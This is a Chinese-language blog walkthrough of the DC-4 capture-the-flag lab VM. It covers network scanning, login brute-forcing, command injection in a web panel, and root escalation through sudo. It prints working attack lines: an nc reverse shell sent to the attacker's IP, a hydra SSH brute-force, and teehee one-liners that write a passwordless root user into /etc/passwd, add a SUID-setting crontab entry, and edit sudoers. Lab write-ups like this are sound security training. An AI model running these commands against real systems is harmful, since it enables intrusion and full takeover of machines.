DC-4

例行扫ip和端口

root@kali:~# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:64:e1:4d, IPv4: 192.168.32.135
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
......
192.168.32.145  00:0c:29:b3:0a:ad       VMware, Inc.
......
root@kali:~# nmap 192.168.32.145
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 02:22 EDT
Nmap scan report for 192.168.32.145
Host is up (0.00014s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:B3:0A:AD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds

哦豁,这次ssh+http,又是猜解连接的套路?先访问80瞅瞅。

是一个Admin Information System Login界面,上来就要账号密码,这谁顶得住啊,那就爆破吧,还能怎的。。。

爆破发现happy是密码,发生了302跳转。进去就给了run command的待遇,虽然限制三条命令,但这不抓包执行任意命令我都对不起它。发现可行,尝试反弹shell

反弹shell

radio=nc+-e+/bin/bash+192.168.32.135+9999&submit=Run
python -c 'import pty; pty.spawn("/bin/bash")'

成功反弹getshell

进入home目录,得到有三个账号用户:charlesjimsam,分别进入文件夹查看后,仅在jim文件夹内看到了名为old-passwords.bak,保存到本地搞成字典,去爆破ssh去(有点DC-2套路的意思)

将三个用户名和密码分别做成字典,利用hydra进行爆破:

root@kali:~# hydra -L user.txt -P passwd.txt ssh://192.168.32.145
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-15 10:29:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 756 login tries (l:3/p:252), ~48 tries per task
[DATA] attacking ssh://192.168.32.145:22/
[STATUS] 179.00 tries/min, 179 tries in 00:01h, 580 to do in 00:04h, 16 active
[22][ssh] host: 192.168.32.145   login: jim   password: jibril04

成功爆破出来了一个login:jimpassword:jibril04,连接上去瞅瞅。

jim@dc-4:~$ ls
backups  mbox  test.sh
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

三个文件除了mbox刚看不了其他都看过了,打开后是封邮件,去/var/mail再看看,果然有收获!

jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

然后得到了charles的密码,登上去之后,据佬佬思路教学,一般都会先sudo -l,查看用户权限,之前查看jim的没有任何可用的权限,而charles却有免密执行/usr/bin/teehee的权限,果然跟老板关系好的人,权限都不一般。

charles@dc-4:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

查看了一下teehee的使用也确实很amazing啊,-a在文件末尾追加,而非覆盖。

提权

方法一:直接添加root权限新用户提权

因为charles具有teehee的无密码执行权限且可以向文件写入内容,所以可以结合sudo添加新用户。

charles@dc-4:~$ echo "Tr0jAn::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
Tr0jAn::0:0:::/bin/bash
charles@dc-4:~$ su Tr0jAn
root@dc-4:/home/charles#

获得root权限。该方法要注意同时只能有一个root用户在线,若真正的root用户在线,则无法免密提权!

参数解释

Tr0jAn::0:0:::/bin/bash
[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]

方法二:通过重要文件执行脚本提权

Linux下相对重要的文件,无非就是定时任务文件(crontab)sudoers文件

一、定时任务文件
charles@dc-4:~$ echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
* * * * * root chmod 4777 /bin/sh
charles@dc-4:~$ /bin/sh
# whoami
root
二、sudoers文件

kali机器上看看sudoers文件该咋写,仿造着在靶机上写一个

root@kali:~# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

@includedir /etc/sudoers.d

看起来只需要写入charles ALL=(ALL:ALL) ALL/etc/sudoers文件内即可:

charles@dc-4:~$ echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
charles ALL=(ALL:ALL) ALL
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
    (ALL : ALL) ALL
charles@dc-4:~$ sudo /bin/bash

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for charles: 
root@dc-4:/home/charles# whoami
root

成功写入后sudo -l查看执行权限已经ALL了,然后执行所有命令,即sudo /bin/bash,输入charles的登录密码就ok了,最终getflag

root@dc-4:/# find / -name "*flag*"
......
/root/flag.txt
......
root@dc-4:/# cat /root/flag
cat: /root/flag: No such file or directory
root@dc-4:/# cat /root/flag.txt
888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 

Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

这套靶机用到的知识点:

1.登录密码位弱口令;
2.存在任意代码执行漏洞;
3.邮件信息泄露;
4.低权限账号免密码执行高权限命令;
5.非法修改数据,进而提权。
最后修改:2020 年 08 月 28 日 11 : 53 AM
© 允许规范转载
请作者喝杯奶茶吧~